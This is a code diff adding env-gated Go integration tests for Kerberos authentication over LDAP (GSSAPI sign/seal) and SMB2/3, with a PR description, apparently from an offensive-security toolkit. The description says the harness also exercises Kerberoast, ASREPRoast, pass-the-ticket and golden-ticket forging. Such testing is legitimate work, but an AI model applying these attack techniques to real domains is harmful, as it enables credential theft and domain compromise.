+		t.Skip("set KRB5_TEST_KDC/KRB5_TEST_REALM/KRB5_TEST_USER/KRB5_TEST_PASS to run the live LDAP Kerberos tests")
+	}
+	if e.Target == "" {
+		e.Target = kdc
+	}
+	return e
+}
+
+func (e ldapEnv) creds(t *testing.T) *credentials.Credentials {
+	t.Helper()
+	creds, err := credentials.NewCredentials(e.Realm, e.User, e.Pass, "")
+	if err != nil {
+		t.Fatalf("NewCredentials: %v", err)
+	}
+	return creds
+}
+
+// gssapiBindAndSearch binds to LDAP with GSSAPI/Kerberos using the requested
+// security layer (applied via layer), then performs a real search over the
+// (signed and/or sealed) connection: it reads the naming contexts from the
+// RootDSE and does a base-object search on the default naming context.
+func gssapiBindAndSearch(t *testing.T, e ldapEnv, layer func(*ldap.Session)) {
+	t.Helper()
+	s, err := ldap.NewSession(e.Target, 389, e.creds(t), false, true)
+	if err != nil {
+		t.Fatalf("NewSession: %v", err)
+	}
+	if layer != nil {
+		layer(s)
+	}
+	ok, err := s.Connect()
+	if err != nil || !ok {
+		t.Fatalf("GSSAPI Connect: ok=%v err=%v", ok, err)
+	}
+	defer s.Close()
+
+	ncs, err := s.GetAllNamingContexts()
+	if err != nil {
+		t.Fatalf("GetAllNamingContexts over GSSAPI layer: %v", err)
+	}
+	if len(ncs) == 0 {
+		t.Fatal("no naming contexts returned")
+	}
+
+	entries, err := s.QueryBaseObject("defaultNamingContext", "(objectClass=*)", []string{"distinguishedName", "objectSid"})
+	if err != nil {
+		t.Fatalf("base-object search over GSSAPI layer: %v", err)
+	}
+	if len(entries) == 0 {
+		t.Fatal("base-object search returned no entries")
+	}
+	t.Logf("[ok] GSSAPI bind + search: %d naming contexts, base DN %q", len(ncs), entries[0].DN)
+}
+
+// TestLiveLDAP_GSSAPI_Sign binds with the GSSAPI integrity (signing) layer and
+// searches; every LDAP PDU after the bind is GSS-signed and verified.
+func TestLiveLDAP_GSSAPI_Sign(t *testing.T) {
+	e := requireLDAPEnv(t)
+	gssapiBindAndSearch(t, e, func(s *ldap.Session) { s.SetGSSAPISigning() })
+}
+
+// TestLiveLDAP_GSSAPI_Seal binds with the GSSAPI confidentiality (sealing) layer
+// and searches; every LDAP PDU after the bind is GSS-encrypted.
+func TestLiveLDAP_GSSAPI_Seal(t *testing.T) {
+	e := requireLDAPEnv(t)
+	gssapiBindAndSearch(t, e, func(s *ldap.Session) { s.SetGSSAPISealing() })
+}
+
+// TestLiveLDAP_GSSAPI_AuthOnly binds with GSSAPI and no security layer (the
+// historical default) and searches, confirming the auth-only path also works.
+func TestLiveLDAP_GSSAPI_AuthOnly(t *testing.T) {
+	e := requireLDAPEnv(t)
+	gssapiBindAndSearch(t, e, nil)
+}

--- a/network/smb/smb_v20/client/session_kerberos_integration_test.go
+++ b/network/smb/smb_v20/client/session_kerberos_integration_test.go
@@ -1,0 +1,200 @@
+//go:build integration
+
+// Live integration coverage for the SMB2 Kerberos session setup
+// (SessionSetupKerberos) against a real file server / domain controller,
+// exercising both SMB 2.x signing (HMAC-SHA256) and SMB 3.1.1 signing
+// (AES-128-CMAC) plus AES-GCM encryption. Excluded from the default build by the
+// "integration" tag; skipped unless the environment is configured.
+//
+// Configuration:
+//
+//	KRB5_TEST_KDC     KDC / domain-controller host or IP (obtains the TGT)
+//	KRB5_TEST_REALM   Kerberos realm / AD domain
+//	KRB5_TEST_USER    account sAMAccountName
+//	KRB5_TEST_PASS    account password
+//	KRB5_TEST_TARGET  SMB server FQDN (defaults to KRB5_TEST_KDC). The SPN used is
+//	                  cifs/<target>; the transport dials the resolved IP on 445.
+//
+// Example:
+//
+//	KRB5_TEST_KDC=10.0.0.10 KRB5_TEST_REALM=EXAMPLE.LOCAL \
+//	KRB5_TEST_USER=Administrator KRB5_TEST_PASS='…' \
+//	KRB5_TEST_TARGET=dc.example.local \
+//	  go test -tags integration -v -run TestLiveSMB ./network/smb/smb_v20/client/
+package client
+
+import (
+	"fmt"
+	"net"
+	"os"
+	"testing"
+
+	"github.com/TheManticoreProject/Manticore/network/smb/smb_v20/capabilities"
+	"github.com/TheManticoreProject/Manticore/network/smb/smb_v20/dialects"
+	"github.com/TheManticoreProject/Manticore/network/smb/smb_v20/message/commands"
+	"github.com/TheManticoreProject/Manticore/network/smb/smb_v20/securitymode"
+	"github.com/TheManticoreProject/Manticore/windows/credentials"
+)
+
+type smbEnv struct {
+	KDC    string
+	Realm  string
+	User   string
+	Pass   string
+	Target string // SMB server FQDN (for the cifs/ SPN)
+	IP     net.IP // resolved target address for the transport
+}
+
+func requireSMBEnv(t *testing.T) smbEnv {
+	t.Helper()
+	e := smbEnv{
+		KDC:    os.Getenv("KRB5_TEST_KDC"),
+		Realm:  os.Getenv("KRB5_TEST_REALM"),
+		User:   os.Getenv("KRB5_TEST_USER"),
+		Pass:   os.Getenv("KRB5_TEST_PASS"),
+		Target: os.Getenv("KRB5_TEST_TARGET"),
+	}
+	if e.KDC == "" || e.Realm == "" || e.User == "" || e.Pass == "" {
+		t.Skip("set KRB5_TEST_KDC/KRB5_TEST_REALM/KRB5_TEST_USER/KRB5_TEST_PASS to run the live SMB Kerberos tests")
+	}
+	if e.Target == "" {
+		e.Target = e.KDC
+	}
+	addr, err := net.ResolveIPAddr("ip", e.Target)
+	if err != nil {
+		t.Fatalf("resolve target %q: %v", e.Target, err)
+	}
+	e.IP = addr.IP
+	return e
+}
+
+func (e smbEnv) creds(t *testing.T) *credentials.Credentials {
+	t.Helper()
+	creds, err := credentials.NewCredentials(e.Realm, e.User, e.Pass, "")
+	if err != nil {
+		t.Fatalf("NewCredentials: %v", err)
+	}
+	return creds
+}
+
+// TestLiveSMB_Kerberos_SMB311_SignedEncrypted negotiates SMB 3.1.1, authenticates
+// with Kerberos, performs a signed tree connect, then enables SMB3 encryption and
+// performs an AES-GCM-encrypted tree connect.
+func TestLiveSMB_Kerberos_SMB311_SignedEncrypted(t *testing.T) {
+	e := requireSMBEnv(t)
+
+	c := NewClientUsingTCPTransport(e.IP, 445)
+	if err := c.Connect(e.IP, 445); err != nil {
+		t.Fatalf("Connect/Negotiate: %v", err)
+	}
+	defer c.Disconnect()
+
+	if c.Connection.Dialect != dialects.SMB2_DIALECT_3_1_1 {
+		t.Fatalf("expected SMB 3.1.1 dialect, negotiated %s", c.Connection.Dialect)
+	}
+
+	spn := "cifs/" + e.Target
+	if err := c.SessionSetupKerberos(e.creds(t), e.KDC, spn); err != nil {
+		t.Fatalf("SessionSetupKerberos: %v", err)
+	}
+	if !c.Session.SigningActive {
+		t.Fatal("signing not active after SMB 3.1.1 Kerberos session setup")
+	}
+
+	// Signed tree connect (AES-128-CMAC): the response signature is verified in
+	// sendReceive, so a successful connect proves the derived signing key.
+	if err := c.TreeConnect("IPC$"); err != nil {
+		t.Fatalf("signed TreeConnect(IPC$): %v", err)
+	}
+	t.Logf("[ok] SMB 3.1.1 signed tree connect to IPC$")
+
+	// Enable SMB3 AES-GCM encryption and perform an encrypted exchange: the tree
+	// connect request is wrapped in a TRANSFORM_HEADER and the response is
+	// decrypted and authenticated by the AEAD tag.
+	if err := c.EnableEncryption(); err != nil {
+		t.Fatalf("EnableEncryption: %v", err)
+	}
+	if !c.IsEncryptionActive() {
+		t.Fatal("encryption not active after EnableEncryption")
+	}
+	if err := c.TreeConnect("IPC$"); err != nil {
+		t.Fatalf("encrypted TreeConnect(IPC$): %v", err)
+	}
+	t.Logf("[ok] SMB 3.1.1 AES-GCM encrypted tree connect to IPC$")
+}
+
+// TestLiveSMB_Kerberos_SMB21_Signed negotiates only up to SMB 2.1, authenticates
+// with Kerberos, and performs a signed (HMAC-SHA256) tree connect.
+//
+// Skipped unless KRB5_TEST_SMB21 is set: a modern Windows domain controller
+// rejects SMB 2.0.2/2.1 sessions outright (STATUS_USER_SESSION_DELETED — the same
+// for NTLM and Kerberos), so this path can only be validated against a member
+// server or share that still permits the 2.x dialect family. The 2.x signing key
+// derivation itself (session key == HMAC-SHA256 signing key) is covered by the
+// package unit tests.
+func TestLiveSMB_Kerberos_SMB21_Signed(t *testing.T) {
+	e := requireSMBEnv(t)
+	if os.Getenv("KRB5_TEST_SMB21") == "" {
+		t.Skip("set KRB5_TEST_SMB21=1 (and target a server that permits SMB 2.x) to run the SMB 2.1 signing test; DCs reject 2.x")
+	}
+
+	c := NewClientUsingTCPTransport(e.IP, 445)
+	if err := c.Transport.Connect(e.IP, 445); err != nil {
+		t.Fatalf("transport connect: %v", err)
+	}
+	defer c.Disconnect()
+
+	if err := negotiate21(c); err != nil {
+		t.Fatalf("SMB 2.1 negotiate: %v", err)
+	}
+	if c.Connection.Dialect != dialects.SMB2_DIALECT_2_1_0 {
+		t.Fatalf("expected SMB 2.1 dialect, negotiated %s", c.Connection.Dialect)
+	}
+
+	spn := "cifs/" + e.Target
+	if err := c.SessionSetupKerberos(e.creds(t), e.KDC, spn); err != nil {
+		t.Fatalf("SessionSetupKerberos: %v", err)
+	}
+	if !c.Session.SigningActive {
+		t.Fatal("signing not active after SMB 2.1 Kerberos session setup")
+	}
+
+	if err := c.TreeConnect("IPC$"); err != nil {
+		t.Fatalf("signed TreeConnect(IPC$): %v", err)
+	}
+	t.Logf("[ok] SMB 2.1 HMAC-SHA256 signed tree connect to IPC$")
+}
+
+// negotiate21 performs an SMB2 NEGOTIATE offering only 2.0.2 and 2.1, forcing the
+// server to select the SMB 2.x dialect family (the client's public Negotiate
+// always offers up to 3.1.1, which an AD server would prefer). It mirrors the
+// non-3.1.1 portion of Negotiate.
+func negotiate21(c *Client) error {
+	req := commands.NewNegotiateRequest()
+	req.AddDialect(dialects.SMB2_DIALECT_2_0_2)
+	req.AddDialect(dialects.SMB2_DIALECT_2_1_0)
+	req.ClientGuid = c.ClientGuid
+	req.SecurityMode = securitymode.SMB2_NEGOTIATE_SIGNING_ENABLED
+	req.Capabilities = capabilities.SMB2_GLOBAL_CAP_LARGE_MTU
+
+	// The 2.x dialects carry no pre-auth integrity; keep the buffer non-nil so the
+	// (unused for 2.x) hash-folding in the session setup is harmless.
+	c.Connection.PreauthIntegrityHashValue = make([]byte, preauthHashLength)
+
+	msg := c.newRequest(req)
+	msg.Header.SessionId = 0
+
+	response, err := c.sendReceive(msg, "Negotiate21")
+	if err != nil {
+		return err
+	}
+	if status := statusFromResponse(response); status != 0x00000000 {
+		return fmt.Errorf("negotiate failed: 0x%08x", status)
+	}
+	negotiateResponse, ok := response.Command.(*commands.NegotiateResponse)
+	if !ok {
+		return fmt.Errorf("unexpected negotiate response command: %T", response.Command)
+	}
+	c.ApplyNegotiateResponse(negotiateResponse)
+	return nil
+}


### PR DESCRIPTION
### Linked Issue
`Closes #921`

### Summary
Adds an env-gated `//go:build integration` test harness that exercises the native (stdlib-only) Kerberos paths against a real KDC / domain controller, giving the features validated ad hoc during development a permanent regression net. Follows the existing DCE/RPC `auth_integration_test` precedent: excluded from the default build by the `integration` tag and skipped cleanly when the `KRB5_TEST_*` configuration is absent, so the normal build and `go test ./...` are unaffected. No secrets are committed — everything is read from the environment.

### What is covered
- **network/kerberos/v5** — `GetTGT` (password / NT-hash / AES-key / keytab), `GetTGS`, Kerberoast, ASREPRoast, U2U, `Renew`, kirbi + ccache export→import pass-the-ticket, golden forge→use, `S4U2Self`→`S4U2Proxy`, FAST-armored AS-REQ, and a live PAC decode (U2U-to-self ticket decrypted with the client's TGT session key, PAC parsed).
- **network/smb/smb_v20/client** — `SessionSetupKerberos` with an SMB 3.1.1 signed (AES-128-CMAC) tree connect and an AES-GCM-encrypted tree connect, plus a gated SMB 2.1 (HMAC-SHA256) signing test.
- **network/ldap** — GSSAPI/Kerberos bind with the integrity (sign) and confidentiality (seal) security layers, each followed by a real search.
- **network/dcerpc/v5/client** — `SetAuthKerberos` at CONNECT / PKT / PKT_INTEGRITY / PKT_PRIVACY, each with a protected `ept_lookup`.

### Configuration and gating
Baseline vars (`KRB5_TEST_KDC` / `KRB5_TEST_REALM` / `KRB5_TEST_USER` / `KRB5_TEST_PASS`, plus `KRB5_TEST_SPN` and `KRB5_TEST_TARGET`) drive the always-on paths. Paths a single-domain lab cannot exercise are behind their own variables and skip by default: keytab (`KRB5_TEST_KEYTAB`), ASREPRoast (`KRB5_TEST_ASREP_USER`), FAST (`KRB5_TEST_FAST`), S4U (`KRB5_TEST_S4U_SPN`), golden forge (`KRB5_TEST_KRBTGT_KEY` + `KRB5_TEST_DOMAIN_SID`), and SMB 2.1 (`KRB5_TEST_SMB21` — modern DCs reject the 2.x dialect family with `STATUS_USER_SESSION_DELETED` for both NTLM and Kerberos). Cross-realm and PKINIT are out of scope. Full instructions: `network/kerberos/v5/docs/INTEGRATION_TESTS.md`.

### How verified
- Default build/test unaffected: `go build ./...`, `go vet ./...`, `go test ./...` all green (new files are excluded by the `integration` tag).
- Integration set compiles under the tag: `go vet -tags integration ./...` clean.
- **Live** against a Windows Server 2016 DC: the baseline suite passes end-to-end across all four subsystems (kerberos v5, SMB 3.1.1 sign+encrypt, LDAP sign/seal, DCE/RPC CONNECT/PKT/PKT_INTEGRITY/PKT_PRIVACY ept_lookup). The gated golden-forge and FAST paths were also confirmed live.

### How to run
```sh
KRB5_TEST_KDC=… KRB5_TEST_REALM=… KRB5_TEST_USER=… KRB5_TEST_PASS=… \
KRB5_TEST_SPN=ldap/dc.example.local KRB5_TEST_TARGET=dc.example.local \
  go test -tags integration -v \
    ./network/kerberos/v5/... ./network/smb/smb_v20/client/ \
    ./network/ldap/ ./network/dcerpc/v5/client/
```